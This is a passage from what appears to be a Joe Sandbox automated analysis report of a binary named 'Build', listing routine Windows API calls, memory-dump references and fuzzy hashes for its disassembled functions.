                                                                                          • Opcode Fuzzy Hash: c53886fa6d59ccf39422170ca7c26bb015de75a3c2950c93ee2f5e5305da6618
                                                                                          • Instruction Fuzzy Hash: A511D3316016159FCF23EFA4DC8289A77ADFB45360B1501E9E916DB211E730ED01CB91
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0036B907
                                                                                          • GetLastError.KERNEL32 ref: 0036B914
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 98df7b58c1356a858c87590abde5bccebafb1d34ef5cc07a59bbaa598046b03f
                                                                                          • Instruction ID: 12e61cd4177ddf2648a83a8bed4d2824a12855e5ab1bc8ef63fbb1d2d67f0cfb
                                                                                          • Opcode Fuzzy Hash: 98df7b58c1356a858c87590abde5bccebafb1d34ef5cc07a59bbaa598046b03f
                                                                                          • Instruction Fuzzy Hash: D411E130A10700ABE726D629C885BA6F3ECEB05370F608629E252D36D4D770ED85CB60
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0038BB55
                                                                                            • Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0
                                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,?,003A50C4,0036190A,?,?,00000007,?,?,?,00361476,?,00000000), ref: 0038BB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocAllocate_free
                                                                                          • String ID:
                                                                                          • API String ID: 2447670028-0
                                                                                          • Opcode ID: ddb9b5a96b23764738c61ae9cb2e033a2882de0d983e3e777d9c01ce836e21e4
                                                                                          • Instruction ID: 7380bad7bacc6127e63b226b3231c56b7855a261c6e4fef4d4c5175e619fb990
                                                                                          • Opcode Fuzzy Hash: ddb9b5a96b23764738c61ae9cb2e033a2882de0d983e3e777d9c01ce836e21e4
                                                                                          • Instruction Fuzzy Hash: 35F06231501717A7DB233A66AC01F6BFB6C9F82BB0F164196F8159A1A5DF21DC0183A9
                                                                                          APIs
                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0036BF5E,?,?), ref: 0036C305
                                                                                            • Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036BF5E,?,?), ref: 0036C334
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2673547680-0
                                                                                          • Opcode ID: 1810c5d0399c5d07e5f12ac61c3ded24d3ae50b057a15485cc1aa851c0429c8f
                                                                                          • Instruction ID: 8938edccae522e5e808fd44bf23b6afe5e0ef723416e41534a5545a0c9fb65d3
                                                                                          • Opcode Fuzzy Hash: 1810c5d0399c5d07e5f12ac61c3ded24d3ae50b057a15485cc1aa851c0429c8f
                                                                                          • Instruction Fuzzy Hash: F1F09075601219ABDB02AF719C41AEF77ACEF09304F40C096B945D7250DA35DE45CB64
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,?,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?,?), ref: 0036BC82
                                                                                            • Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000800,?,0036B14B,?,00000000,0036AF6E,92C77967,00000000,0039517A,000000FF,?,00368882,?), ref: 0036BCAE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2643169976-0
                                                                                          • Opcode ID: f723ab41559aab83db9d936db38b695695acaeb652ea21b43f46b8a4b3ef4788
                                                                                          • Instruction ID: b85339dfacba9fff56cc13e0c7273aec681c1a8bc517b05027d0afa4be91d476
                                                                                          • Opcode Fuzzy Hash: f723ab41559aab83db9d936db38b695695acaeb652ea21b43f46b8a4b3ef4788
                                                                                          • Instruction Fuzzy Hash: F8F0E9356012189BD702EF749C42EDE73AC9F0D300F404056FA01D7141DF71DE898B94
                                                                                          APIs
                                                                                          • _swprintf.LIBCMT ref: 00380341
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00380358
                                                                                            • Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
                                                                                            • Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
                                                                                            • Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
                                                                                            • Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
                                                                                            • Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                          • String ID:
                                                                                          • API String ID: 2718869927-0
                                                                                          • Opcode ID: 8e3194a6adf327b17e30cf3e90f7b95a4570c9a4c24c2d89a0679fed1bc86f50
                                                                                          • Instruction ID: 5b71da34a2efc90e55534cd4c68e3643b0ef2bf5fbab926b18c72ec33d0ab1c4
                                                                                          • Opcode Fuzzy Hash: 8e3194a6adf327b17e30cf3e90f7b95a4570c9a4c24c2d89a0679fed1bc86f50
                                                                                          • Instruction Fuzzy Hash: D8F096715103086ACB13EB69DC06EDF7BAC9B0E304F044091B20597152D5349A018B61
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,0036BCD4,?,00368607,?), ref: 0036BCFA
                                                                                            • Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0036BCD4,?,00368607,?), ref: 0036BD24
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2673547680-0
                                                                                          • Opcode ID: a4d35651fea564bc9ed6abfbaab112d5a28fc39866f8b499adb2bbef0034432a
                                                                                          • Instruction ID: 7694721fc9d4e9b1c5b8eb2cf7897614433ecc4833693b13b0e3289f0d7bdc3b
                                                                                          • Opcode Fuzzy Hash: a4d35651fea564bc9ed6abfbaab112d5a28fc39866f8b499adb2bbef0034432a
                                                                                          • Instruction Fuzzy Hash: 85F0BE31A002185BC702FFB89D419EEB7BCAB4E760F0141A5FA41EB280DB709E818B94
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,003731C7,0036D526), ref: 00373191
                                                                                          • GetProcessAffinityMask.KERNEL32(00000000,?,003731C7), ref: 00373198
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                          • String ID:
                                                                                          • API String ID: 1231390398-0
                                                                                          • Opcode ID: 8377d9c1ccf609d0079ce9f1f28cf14885cb026ab372f7f43fe8d33763cd3d40
                                                                                          • Instruction ID: 92cc127caa5782c4a7d19598ca563e914391230dc0d36924472e9cb449eb3590
                                                                                          • Opcode Fuzzy Hash: 8377d9c1ccf609d0079ce9f1f28cf14885cb026ab372f7f43fe8d33763cd3d40
                                                                                          • Instruction Fuzzy Hash: 9EE0D872B10105679F1B97A49C468EB73DDDA44344711807AA507D3300F93DDE0556A0
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1175261203-0
                                                                                          • Opcode ID: ba3e293510f4d92132360e8be4a9c80aedb2027439b0516af4eb9f9371402a35
                                                                                          • Instruction ID: 6b59d0a57b44e1fb4b7e83c0fffda9acecd89c5b0c978dbddf8e8c35b6600d0e
                                                                                          • Opcode Fuzzy Hash: ba3e293510f4d92132360e8be4a9c80aedb2027439b0516af4eb9f9371402a35
                                                                                          • Instruction Fuzzy Hash: BDF0E271A00208ABCB12EFA8DC49DDFB7FCEF4D701F0000AAB605D7100CA74EA898B64
                                                                                          APIs
                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,0039505D,000000FF), ref: 0037CD7D
                                                                                          • OleUninitialize.OLE32(?,?,?,?,0039505D,000000FF), ref: 0037CD82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 3856339756-0
                                                                                          • Opcode ID: 6d2bd949ba20f88c41532d62be149f7bbeb53dc676dac6b578e9aa941d09c0e4
                                                                                          • Instruction ID: 9b3fe520016d2a1ff2e978e94f52b54e2ee156f447cfe2647590ffbc8bfa9749
                                                                                          • Opcode Fuzzy Hash: 6d2bd949ba20f88c41532d62be149f7bbeb53dc676dac6b578e9aa941d09c0e4
                                                                                          • Instruction Fuzzy Hash: 07F05E76604A44AFC702DF19DC01F5AFBBCFB4AB20F00426AE816C37A0DB35A941CB94
                                                                                          APIs
                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037C36E
                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037C375
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                          • String ID:
                                                                                          • API String ID: 1918208029-0
                                                                                          • Opcode ID: 5b7d3bfc2719bd467750fa9be1af80b934f6e85d2f6b94ecd6e7ddc1d2c6a1d3
                                                                                          • Instruction ID: 7b732425638d77d2030975da636ebcd37575aae318267528ac7d20ff383c2974
                                                                                          • Opcode Fuzzy Hash: 5b7d3bfc2719bd467750fa9be1af80b934f6e85d2f6b94ecd6e7ddc1d2c6a1d3
                                                                                          • Instruction Fuzzy Hash: B6E06DB5410208EBDB21EF95C840B99B7FCEB05310F10C05FE89A93200D274AE409F50
                                                                                          APIs
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003851CA
                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003851D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                          • String ID:
                                                                                          • API String ID: 1660781231-0
                                                                                          • Opcode ID: cb1c0dfa6722c397ac1da3ea99bba6fdbb9074839b12f3d5008ef6cb29d55b74
                                                                                          • Instruction ID: 50e4451103baff1c8f7a5aeadd233926b60d5c135388588ce5de9595a3618394
                                                                                          • Opcode Fuzzy Hash: cb1c0dfa6722c397ac1da3ea99bba6fdbb9074839b12f3d5008ef6cb29d55b74
                                                                                          • Instruction Fuzzy Hash: 79D02228948F0048CC1336B43C0BBAB2B589A027F17F01BCAE421CE9D2EE528C406711
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3351165006-0
                                                                                          • Opcode ID: 890d7d6f1998e756ec035ad43e59d0fa8ef8f7cfee99903cf1ec2c84643bd8b1
                                                                                          • Instruction ID: f7ea1c0a4f65806db6967124f7b24cc853627f4f1cc6610f9c065c795a4fb8cd
                                                                                          • Opcode Fuzzy Hash: 890d7d6f1998e756ec035ad43e59d0fa8ef8f7cfee99903cf1ec2c84643bd8b1
                                                                                          • Instruction Fuzzy Hash: B8C0123205C600BECB020BB0DC09C2ABBACABA4312F19CA08F8B6C1060C239C010DF11
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: 6041ad606e6c3622fd193d325334278b4e898675857eac4269e48483afb0ec2c
                                                                                          • Instruction ID: ce43af1a7ec79881008a8f067179bcfaa924e1a9472806237b2f06245a1b99e5
                                                                                          • Opcode Fuzzy Hash: 6041ad606e6c3622fd193d325334278b4e898675857eac4269e48483afb0ec2c
                                                                                          • Instruction Fuzzy Hash: 92C1A270A042509FDF26CF28C4847AD7BB5AF46310F1D85B9EC469F29ACB35DA44CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00361483
                                                                                            • Part of subcall function 00366AE8: __EH_prolog3.LIBCMT ref: 00366AEF
                                                                                            • Part of subcall function 0036EE0F: __EH_prolog3.LIBCMT ref: 0036EE16
                                                                                            • Part of subcall function 0036668F: __EH_prolog3.LIBCMT ref: 00366696
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: 6b28d470a95391ce2d1f40f63b170327547294c65cd90fd700d847b7bfb050db
                                                                                          • Instruction ID: fa96a54626fd693c8d865af328ccc278eb64b15e5992d016250d85a788ae6421
                                                                                          • Opcode Fuzzy Hash: 6b28d470a95391ce2d1f40f63b170327547294c65cd90fd700d847b7bfb050db
                                                                                          • Instruction Fuzzy Hash: 8E4136B0A063808ECB15DF6994812D9BBE6AF59300F0C41BEEC5ECF29BD7755215CB62
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: dafbfe446def65c4e1631da2c599340c32d9b2156c44ce23467515ac90f92003
